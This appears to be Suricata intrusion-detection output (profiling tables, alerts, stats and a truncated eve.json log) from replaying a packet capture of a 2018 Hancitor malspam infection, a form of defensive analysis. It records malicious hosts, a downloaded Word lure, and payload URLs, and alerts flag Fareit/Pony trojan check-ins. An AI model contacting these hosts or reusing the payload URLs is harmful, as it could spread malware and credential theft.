TMM_DECODEPCAPFILE          IPv4       6          5791             2652        9628084          5347         31.0m    2.48
TMM_DECODEPCAPFILE          IPv4      17            24             2744          24392          4186        100.5k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          5791             2777          55964          3374         19.5m  1.85  
flow                    IPv4      17            24             3159          31369          5956        142.9k  0.01  
stream                  IPv4       6          5957             2839        9732866         14664         87.4m  8.28  
app-layer               IPv4      17            24             9523          63519         19573        469.8k  0.04  
detect                  IPv4       6          5957            44637       19026374        154080        917.9m  87.00 
detect                  IPv4      17            24           175246        5193427        492809         11.8m  1.12  
tcp-prune               IPv4       6          5957             2540          78566          2996         17.9m  1.69  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            67             3051          56859         16392          1.1m  48.78 
tls                     IPv4       6           328             2619          16275          2973        975.2k  43.31 
dns                     IPv4      17            24             4086          31506          7424        178.2k  7.91  
Proto detect            IPv4      17            24             5137          29098          9016        216.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             4            44824         144141         71055        284.2k  0.71  
LOGGER_UNIFIED2             IPv4       6             4            41956         215910         85822        343.3k  0.85  
LOGGER_JSON_ALERT           IPv4       6             4            67258         125547         83406        333.6k  0.83  
LOGGER_JSON_DNS             IPv4      17            22            32426        8422197        434073          9.5m  23.72 
LOGGER_JSON_HTTP            IPv4       6            66            38341         163980         77299          5.1m  12.67 
LOGGER_JSON_TLS             IPv4       6           164            33349        7587733         98232         16.1m  40.02 
LOGGER_JSON_FILE            IPv4       6           127            44802         166667         67155          8.5m  21.19 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          1982             2547        5863741         18467        36.6m  26.06 
payload                           IPv4      17            24             6456        4865958        230573         5.5m  3.94  
stream                            IPv4       6          1982             2541        4543406         20666        41.0m  29.16 
http_uri                          IPv4       6            66             4857         100670         10948       722.6k  0.51  
http_request_line                 IPv4       6            66             3144          24742          4459       294.3k  0.21  
http_client_body                  IPv4       6            68             2977         102540         13510       918.7k  0.65  
http_header (request)             IPv4       6            66            16059         282724         43787         2.9m  2.06  
http_header (request trailer)     IPv4       6            66             2582          19854          2916       192.5k  0.14  
http_header_names (request)       IPv4       6            66             7128        5457320         95455         6.3m  4.49  
http_accept (request)             IPv4       6            66             2932           7106          3463       228.6k  0.16  
http_referer (request)            IPv4       6            66             2833           3878          3111       205.4k  0.15  
http_content_len (request)        IPv4       6            66             2951           5310          3802       250.9k  0.18  
http_content_type (request)       IPv4       6            66             2963          22455          6778       447.4k  0.32  
http_start (request)              IPv4       6            66             5437          28750          7436       490.8k  0.35  
http_raw_header (request)         IPv4       6            68             6465          79799         11273       766.6k  0.55  
http_method                       IPv4       6            66             3341          28773          5315       350.8k  0.25  
http_cookie (request)             IPv4       6            66             3013          24088          3613       238.5k  0.17  
http_raw_uri                      IPv4       6            66             2993           6808          4034       266.3k  0.19  
http_user_agent                   IPv4       6            66             7109         150889         16539         1.1m  0.78  
http_host                         IPv4       6            66             3481          18979          5370       354.4k  0.25  
dns_query                         IPv4      17            11             7942          19022         11760       129.4k  0.09  
tls_sni                           IPv4       6           165             3038          23519          4608       760.4k  0.54  
http_response_line                IPv4       6            66             3216          27358          5761       380.3k  0.27  
http_header (response)            IPv4       6            66             8386          48084         18570         1.2m  0.87  
http_header (response trailer)    IPv4       6            66             2588           5800          4176       275.7k  0.20  
http_content_type (response)      IPv4       6            66             2844           6251          3559       234.9k  0.17  
http_raw_header (response)        IPv4       6           383             3634          30101          4981         1.9m  1.36  
http_cookie (response)            IPv4       6            66             2853          35551          3701       244.3k  0.17  
http_stat_code                    IPv4       6            66             2983          10233          3706       244.6k  0.17  
tls_cert_issuer                   IPv4       6           164             3030          22043          4172       684.2k  0.49  
tls_cert_subject                  IPv4       6           164             3260          23742          4473       733.7k  0.52  
tls_cert_serial                   IPv4       6           164             2829          18924          3876       635.8k  0.45  
file_data (http response)         IPv4       6           383             2579        5851602         88461        33.9m  24.12 
Total                             IPv4                  6944                                         20225       140.4m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           460             3858          64318         17252          7.9m  0.77  
PROF_DETECT_IPONLY          IPv4      17            22            18984          47220         26365        580.0k  0.06  
PROF_DETECT_RULES           IPv4       6          5957             2527       18642945         58695        349.7m  34.07 
PROF_DETECT_RULES           IPv4      17            24            99464         223317        146354          3.5m  0.34  
PROF_DETECT_STATEFUL_START    IPv4       6           524             5118        6835857         98228         51.5m  5.02  
PROF_DETECT_STATEFUL_CONT    IPv4       6          5957             2516        6172984          5854         34.9m  3.40  
PROF_DETECT_STATEFUL_CONT    IPv4      17            24             3733          38977          8524        204.6k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          5037             2549          61586          2814         14.2m  1.38  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            24             2619          17345          3536         84.9k  0.01  
PROF_DETECT_PREFILTER       IPv4       6          5957             7826        6506474         45314        269.9m  26.30 
PROF_DETECT_PREFILTER       IPv4      17            24            28526        4892247        264613          6.4m  0.62  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1982            14993        6027005         47490         94.1m  9.17  
PROF_DETECT_PF_PAYLOAD      IPv4      17            24            11581        4871563        236555          5.7m  0.55  
PROF_DETECT_PF_TX           IPv4       6          5037             2558        5993536         16100         81.1m  7.90  
PROF_DETECT_PF_TX           IPv4      17            12             2917          28485         17690        212.3k  0.02  
PROF_DETECT_PF_SORT1        IPv4       6          1851             2529          43385          3395          6.3m  0.61  
PROF_DETECT_PF_SORT1        IPv4      17            24             3073           4842          3399         81.6k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6          5957             2516          74503          2915         17.4m  1.69  
PROF_DETECT_PF_SORT2        IPv4      17            24             2845           4757          3382         81.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          5957             2524          82610          3053         18.2m  1.77  
PROF_DETECT_NONMPMLIST      IPv4      17            24             2888           3821          3217         77.2k  0.01  
PROF_DETECT_ALERT           IPv4       6          5957             2521          63949          2807         16.7m  1.63  
PROF_DETECT_ALERT           IPv4      17            24             2533           5019          2885         69.2k  0.01  
PROF_DETECT_CLEANUP         IPv4       6          5957             2552          85317          2973         17.7m  1.73  
PROF_DETECT_CLEANUP         IPv4      17            24             2940           4678          3410         81.9k  0.01  
PROF_DETECT_GETSGH          IPv4       6          5957             2523       10272179          4969         29.6m  2.88  
PROF_DETECT_GETSGH          IPv4      17            24             2796           6793          5554        133.3k  0.01  


suricata-4.0.0-etopen-all-alert-2019-02-22-T-09-56-41-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (839 bytes)
09/04/2018-15:47:45.825885  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 95.213.235.149:80 -> 10.9.4.102:49165
09/04/2018-15:50:12.796998  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.9.4.102:49173 -> 54.243.179.137:80
09/04/2018-15:50:21.605555  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49176 -> 185.66.9.184:80
09/04/2018-15:50:22.992232  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49179 -> 185.66.9.184:80


stats.log - (3238 bytes)
------------------------------------------------------------------------------------
Date: 2/22/2019 -- 09:56:41 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 5815
decoder.bytes                              | Total                     | 2853064
decoder.ipv4                               | Total                     | 5815
decoder.ethernet                           | Total                     | 5815
decoder.tcp                                | Total                     | 5791
decoder.udp                                | Total                     | 24
decoder.avg_pkt_size                       | Total                     | 490
decoder.max_pkt_size                       | Total                     | 5158
flow.tcp                                   | Total                     | 230
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 230
tcp.syn                                    | Total                     | 230
tcp.synack                                 | Total                     | 230
detect.alert                               | Total                     | 4
detect.mpm_list                            | Total                     | 2
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 2
app_layer.flow.http                        | Total                     | 66
app_layer.tx.http                          | Total                     | 66
app_layer.flow.tls                         | Total                     | 164
app_layer.flow.dns_udp                     | Total                     | 11
app_layer.tx.dns_udp                       | Total                     | 11
flow_mgr.closed_pruned                     | Total                     | 64
flow_mgr.est_pruned                        | Total                     | 11
flow.spare                                 | Total                     | 10069
flow_mgr.flows_checked                     | Total                     | 235
flow_mgr.flows_notimeout                   | Total                     | 2
flow_mgr.flows_timeout                     | Total                     | 233
flow_mgr.flows_timeout_inuse               | Total                     | 164
flow_mgr.flows_removed                     | Total                     | 69
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65300
flow_mgr.rows_empty                        | Total                     | 2
flow_mgr.rows_maxlen                       | Total                     | 2
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7141984


eve.json - (166702 bytes)
{"timestamp":"2018-09-04T15:47:38.531268+0000","flow_id":1502403872037700,"pcap_cnt":1,"event_type":"dns","src_ip":"10.9.4.102","src_port":56774,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11522,"rrname":"resolutesearch.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:47:39.025962+0000","flow_id":1502403872037700,"pcap_cnt":2,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":56774,"proto":"UDP","dns":{"type":"answer","id":11522,"rcode":"NOERROR","rrname":"resolutesearch.com","rrtype":"A","ttl":5,"rdata":"95.213.235.149"}}
{"timestamp":"2018-09-04T15:47:45.825885+0000","flow_id":2022077735395676,"pcap_cnt":209,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-09-04T15:47:45.966335+0000","flow_id":2022077735395676,"pcap_cnt":235,"event_type":"http","src_ip":"10.9.4.102","src_port":49165,"dest_ip":"95.213.235.149","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-09-04T15:48:02.158841+0000","flow_id":2022077735395676,"pcap_cnt":236,"event_type":"fileinfo","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":212992},"app_proto":"http","fileinfo":{"filename":"invoice_149027.doc","gaps":false,"state":"CLOSED","stored":false,"size":212992,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:12.339083+0000","flow_id":1492667191274635,"pcap_cnt":240,"event_type":"dns","src_ip":"10.9.4.102","src_port":59335,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2042,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":5,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":5,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.179.137"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.23.114.123"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.16.248.221"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.19.229.252"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.21.121.219"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.123.39"}}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":1987662172148715,"pcap_cnt":248,"event_type":"alert","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":1987662172148715,"pcap_cnt":248,"event_type":"http","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2018-09-04T15:50:12.804076+0000","flow_id":324990137550060,"pcap_cnt":249,"event_type":"dns","src_ip":"10.9.4.102","src_port":58852,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25574,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:13.886886+0000","flow_id":324990137550060,"pcap_cnt":251,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":58852,"proto":"UDP","dns":{"type":"answer","id":25574,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":2192463392770965,"pcap_cnt":259,"event_type":"http","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":2192463392770965,"pcap_cnt":259,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":566},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":126,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.398978+0000","flow_id":2223301257991810,"pcap_cnt":260,"event_type":"dns","src_ip":"10.9.4.102","src_port":63476,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7227,"rrname":"birgroupholdings.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.489068+0000","flow_id":2223301257991810,"pcap_cnt":261,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":63476,"proto":"UDP","dns":{"type":"answer","id":7227,"rcode":"NOERROR","rrname":"birgroupholdings.com","rrtype":"A","ttl":5,"rdata":"184.95.44.218"}}
{"timestamp":"2018-09-04T15:50:14.854869+0000","flow_id":1892898013870488,"pcap_cnt":318,"event_type":"http","src_ip":"10.9.4.102","src_port":49175,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:14.855358+0000","flow_id":1892898013870488,"pcap_cnt":321,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46326},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","gaps":false,"state":"CLOSED","stored":false,"size":46326,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:20.873439+0000","flow_id":1975357091369951,"pcap_cnt":322,"event_type":"dns","src_ip":"10.9.4.102","src_port":53643,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":622,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:21.464489+0000","flow_id":1975357091369951,"pcap_cnt":323,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":53643,"proto":"UDP","dns":{"type":"answer","id":622,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:21.605555+0000","flow_id":1747655105255709,"pcap_cnt":329,"event_type":"alert","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:22.152587+0000","flow_id":1747655105255709,"pcap_cnt":332,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":207,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1747655105255709,"pcap_cnt":334,"event_type":"http","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1747655105255709,"pcap_cnt":334,"event_type":"fileinfo","src_ip":"185.66.9.184","src_port":80,"dest_ip":"10.9.4.102","dest_port":49176,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":20,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.738803+0000","flow_id":44820831545159,"pcap_cnt":390,"event_type":"http","src_ip":"10.9.4.102","src_port":49177,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:22.739261+0000","flow_id":44820831545159,"pcap_cnt":393,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49177,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47399},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","gaps":false,"state":"CLOSED","stored":false,"size":47399,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.992232+0000","flow_id":1133195609176561,"pcap_cnt":415,"event_type":"alert","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:23.443168+0000","flow_id":1877775434547639,"pcap_cnt":597,"event_type":"http","src_ip":"10.9.4.102","src_port":49178,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:23.443668+0000","flow_id":1877775434547639,"pcap_cnt":600,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49178,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":176301},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","gaps":false,"state":"CLOSED","stored":false,"size":176301,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:23.571912+0000","flow_id":1133195609176561,"pcap_cnt":602,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/d2\/about.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":13},"app_proto":"http","fileinfo":{"filename":"\/d2\/about.php","gaps":false,"state":"CLOSED","stored":false,"size":236,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:23.572559+0000","flow_id":1133195609176561,"pcap_cnt":604,"event_type":"http","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/d2\/about.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:23.572559+0000","flow_id":1133195609176561,"pcap_cnt":604,"event_type":"fileinfo","src_ip":"185.66.9.184","src_port":80,"dest_ip":"10.9.4.102","dest_port":49179,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/d2\/about.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_me

This file has been truncated.


keyword_perf.log - (13990 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 2/22/2019 -- 09:56:41
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9696303         3014            3014            146336          3217.00         3217.00         0.00           
  content          73623870        18585           7038            406200          3961.00         3779.00         4072.00        
  pcre             13898278        4039            2740            71755           3441.00         3383.00         3562.00        
  byte_test        976411          277             210             37670           3524.00         3738.00         2856.00        
  byte_jump        490145          135             3               33366           3630.00         3487.00         3633.00        
  isdataat         33705           12              0               2879            2808.00         0.00            2808.00        
  flowbits         1008506         356             44              5857            2832.00         3236.00         2776.00        
  urilen           1175674         386             64              24339           3045.00         3024.00         3049.00        
  byte_extract     8297            2               2               4627            4148.00         4148.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9696303         3014            3014            146336          3217.00         3217.00         0.00           
  flowbits         972951          349             37              4914            2787.00         2887.00         2776.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
